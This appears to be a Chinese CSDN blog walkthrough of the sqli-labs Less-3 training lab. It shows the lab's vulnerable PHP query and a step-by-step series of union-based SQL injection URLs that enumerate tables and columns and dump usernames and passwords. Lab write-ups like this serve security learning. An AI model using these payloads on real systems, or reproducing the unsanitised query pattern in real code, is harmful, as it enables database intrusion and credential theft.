【Less-3】单引号报错字符型注入 + 需要闭合 “)“

最新推荐文章于 2023-09-07 12:53:23 发布
最新推荐文章于 2023-09-07 12:53:23 发布
阅读量614 收藏 2
点赞数
分类专栏: SQL注入总结 文章标签: mysql 数据库 sql sql注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44032232/article/details/109310307
版权

目录

前言

提示:基于错误,单引号,字符型注入,与前两关不同的是需要闭合括号

1、测试是否存在注入点
http://localhost/sqli-labs/Less-3?id=1'

在这里插入图片描述
源码

$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";

$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
    echo 'Your Login name:'. $row['username'];
    echo 'Your Password:' .$row['password'];
}else{
    print_r(mysql_error());
}

我们在查询时需要将单引号括号进行闭合

$sql=“SELECT * FROM users WHERE id=(‘1’) and 1=1 – +’) LIMIT 0,1”;


http://localhost/sqli-labs/Less-3?id=1') and 1=1 -- +

在这里插入图片描述

http://localhost/sqli-labs/Less-3?id=1') and 1=2 -- +

在这里插入图片描述
由以上操作可知存在SQL注入。

2、判断字段数
http://localhost/sqli-labs/Less-3?id=1') order by 4 -- +

在这里插入图片描述

http://localhost/sqli-labs/Less-3?id=1') order by 3 -- +

在这里插入图片描述

3、查看回显点
http://localhost/sqli-labs/Less-3?id=-1') union select 1,2,3 -- +

在这里插入图片描述
2,3位置为回显位,将我们要查询的参数替换到2/3位置,就可以看到对应的查询结果。

4、联合查询
1)查看当前用户和当前数据库名:
http://localhost/sqli-labs/Less-3?id=-1') union select 1,user(),database() -- +

在这里插入图片描述

2)查看当前库所有表名:
http://localhost/sqli-labs/Less-3?id=-1') union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema="security") -- +

在这里插入图片描述

3)查看users表中的列名:
http://localhost/sqli-labs/Less-3?id=-1') union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users") -- +

在这里插入图片描述

4)查看用户名和密码:
http://localhost/sqli-labs/Less-3?id=-1') union select 1,2,(select group_concat(concat_ws(" ",username,password)) from security.users) -- +

在这里插入图片描述
先将查询出来的用户名和密码以空格链接,这样在用group_concat连接后更容易分辨出用户名个密码。

多学点技术
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Sqli-Labs-Master】Less1-4
Oavinci的博客
06-06 503
phpstudy2016:链接:http://pan.baidu.com/s/1bpbEBCj 密码:fmr4 sqli-labs-master:链接:http://pan.baidu.com/s/1jH4WlMY 密码:11mj Less-1 ?id=1'报错 ?id=1'%23 返回正常 ?id=1' order by 3%23 返回正常 ?id=1' orde...
第六节 GET报错注入-01
最新发布
09-15
在GET单引号报错注入中,攻击者通常会利用URL参数,如`id`,来构造恶意的SQL查询。以Sqli-Lab的Less-5为例,攻击者可以尝试获取表名、数据库名、用户信息等。通过在URL中添加特定的SQL语句,攻击者可以利用`union ...
【Less-4】双引号报错字符注入 + 需要闭合“)“
ssrf
10-27 453
目录前言1、测试是否存在注入点 前言 提示:基于错误,单引号,数字注入,与前两关不同的是需要闭合括号 1、测试是否存在注入点 http://localhost/sqli-labs/Less-4?id=1' 尝试输入双引号 http://localhost/sqli-labs/Less-4?id=1" 源码 $id = '"' . $id . '"'; // 直接将输入的内容两边拼接上双引号 "1" $sql="SELECT * FROM users WHERE id=($id) LIMIT.
SQL注入字符单引号闭合
weixin_43695031的博客
11-06 7786
SQL注入字符单引号闭合) 1、判断为字符还是整,?为连接符 ?id=1 and 1=2 当不报错说明为字符,反之则是整 2、构造闭合 ?id=1’and%20 ‘1’='1 说明是单引号闭合则可以用 --+ 来注释掉后面的 ’ 例如:?id=1’ --+ 也可以用 **?id=1’**来判断,出错了就说明判断对了,因为在源语句中后面多出了一个 ’ ,所以采用上面 –+ 来注释掉后面...
一次性解决eslint单引号、双引号、分号、空格的报错警告问题
m0_56991207的博客
06-08 2万+
eslint总是自动将‘单引号’改为“双引号”,自动给末尾添加逗号,自动给每一项 结尾添加逗号,导致警告或报错,只需要一步解决:尤其‘末尾禁止添加逗号’这个很重要,找了好久~~~
单引号报错注入---sqli-labs靶场前瞻
yzl_007的博客
08-22 335
单引号报错注入sqli-labs靶场前瞻 第一关 输入?id=1后正常回显 测试注入点: 构造一下payload:?id=1’or ‘1’='1 正常回显 ?id=1’ and ‘1’ = '2 无回显,由此判断此处存在sql注入漏洞,也可以用sqlmap跑一下如下: 测试指定url是否存在sql注入sqlmap -u http://127.0.0.1/sqli-labs/Less-1/?id=1 前面测得具有回显,sqlmap也表示存在union联合查询 先查找列 ?id=1
less-plugin-autoprefix:添加了由 autoprefixer 对 less 进行后处理的能力
05-29
从less转换后,使用autoprefixer向css添加前缀。 较少使用 安装.. npm install -g less-plugin-autoprefix 然后在命令行上, lessc file.less --autoprefix="browsers" 浏览器是由逗号分隔的列表。 程序化用法 ...
postcss-less:用于解析LESS的PostCSS语法
05-13
注意:此模块需要Node v6.14.4 +。 poscss-less不是LESS编译器。 要编译LESS,请使用LESS的官方工具集。 安装 使用npm: npm install postcss-less --save-dev 如果您发现此模块有用,请考虑。 用法 无postcss-...
less-plugin-clean-css:使用clean-css对CSS进行后期处理和压缩
02-23
npm install -g less-plugin-clean-css 然后在命令行上 lessc file.less --clean-css="--s1 --advanced --compatibility=ie8" 见的可用命令选项-唯一的区别是advanced和rebase ,我们默认为false,因为它并不总是...
less-plugin-lists:更少的ListArray操作
05-13
少插件列表 用于列表/数组操作的插件。 特征 和 (几乎)迭代语句的规范语法 -在列表上执行算术运算 职能 该插件通过以下功能扩展了... 有关通过命令行Less编译器使用插件的更多详细信息,请参见Less文档中的相应部分。
Sqli-labs-master超详细通关教程(1-23关|基础篇)
weixin_51143375的博客
11-02 2万+
一到四关主要是参数被包装的问题。一般用于尝试的语句 Ps:--+可以用#替换,url 提交过程中 Url 编码后的#为%23 and1=2--+ 'and1=2--+ "and1=2--+ )and1=2--+ ')and1=2--+ ")and1=2--+ "))and1=2--+ 图中显示的sql语句是我为了方便理解,修改了源代码显示出的 第一关: 页面正常,考虑是否有字符注入,先加单引号 可以看到提示,存在' '包装,我们加上--+ http://127.0.0.
SQL&sqli-labs-master
Jackie's Blog
04-03 713
SQL注入学习&个人sqli-labs-master靶场练习
sqli-labs-master靶场搭建,1-10关详解
GN_QT的博客
08-02 1250
输入数字id =1 and 1=2 --+ 没有报错 尝试了 ' " ') ")id=1' --+ 有回显,但是sql语句都被注释了,不能使用报错注入。id=1') and 1=2 --+再判断数据库名第一位是否大于'a',直到s才报错,说明第一位是s。到4的时候才发生报错,说明一共有三个字段,接下里判断显示字段。时间盲注是猜解正确,页面快速返回,猜解错误,则按照规定时间返回。判断是否由字符注入,输入单引号,双引号进行测试,id=1 and 1=2。实现了报错,") and 1=2 --+
048 SQL注入实验——sqli-labs-master,sqlmap自动化
鸡蛋炒鸡蛋
03-03 1545
文章目录一:sqli-labs-master的部署二:sqli注入通关2.1:笔记篇2.2:实操过程less-01less-02less-03less-04less-05less-06less-07less-08less-09三:sqlmap自动化注入 一:sqli-labs-master的部署 这里给到大家一个下载地址: sqli-labs-master (访问密码:zUw77A) 下载之后解压之后得到一个文件 把该文件夹放到已经安装好的phpstudy/www文件目录下 如何安装phpstudy,请参
CenOS6.5搭建sqli-labs-master靶场环境
weixin_42566218的博客
02-17 1806
目录 一、靶场搭建环境准备 二、搭建过程 0x1 配置本地软件仓库 0x2 安装sqli-labs支持服务 0x3 部署sqli-labs靶场 三、测试sqli-labs靶场环境 一、靶场搭建环境准备 sqli-labs-master是一套结合http+php+mysql环境的sql注入练习平台,里面有丰 富的sql注入靶场环境 虚拟机软件: VMware® Workstation 16 Pro...
[sqli-labs-master]环境安装步骤
weixin_44723534的博客
03-19 4880
[sqli-labs-master]前提条件已搭建phpstudy 一、解压sqli-labs-master文件到指定路径 路径是有要求的,要放到PhpStudy某个指定路径下 二、通过浏览器打开 http://192.168.6.142/sqli-labs-master/ 三、初始化数据库环境 3.1 密码不存在,需设置密码 3.2 修改配置文件 路径:C:\PhpStudy2018\PHPTutorial\WWW\sqli-labs-master\sql-connections 文件名:db-c
SQL注入sqli-labs-master靶场第1、2关
qq_24797991的博客
04-04 903
SQL注入闯关
sqli-labs-master安装及报错处理
小白
09-07 1008
Windows版phpstudy下载 - 小皮面板(phpstudy) (xp.cn)注意:这里用的是windows版本。
单引号字符注入
热门推荐
Battery的博客
12-14 11万+
判断sql注入漏洞的类:1.数字、2.字符。用and 1=1 和and 1=2来判断。将1=1换成1=2发现没有报错,但不显示信息,说明可以使用字符注入。继续输入and 1=2,页面显示正常,说明不是数字注入漏洞。使用order by,从一开始逐渐增加,一直到报错时停止。通过此处便可以插入更多的sql语句去查询一些信息。id=1,得到用户名和密码。id=1’ and 1=1--+由此可以确认列数为3(因为到4报错)输入and 1=1来,没有变化。可以得到上一步骤账户的密码。
npm install less less-loader -D 安装less报错
05-09
如果你在安装 `less` 和 `less-loader` 时遇到了报错,可能是由于你的环境缺少依赖或者权限不足等原因导致的。 以下是一些可能的解决方案: 1. 确认你已经安装了 `node.js` 和 `npm`,并且版本都是最新的。 2. ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

多学点技术

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值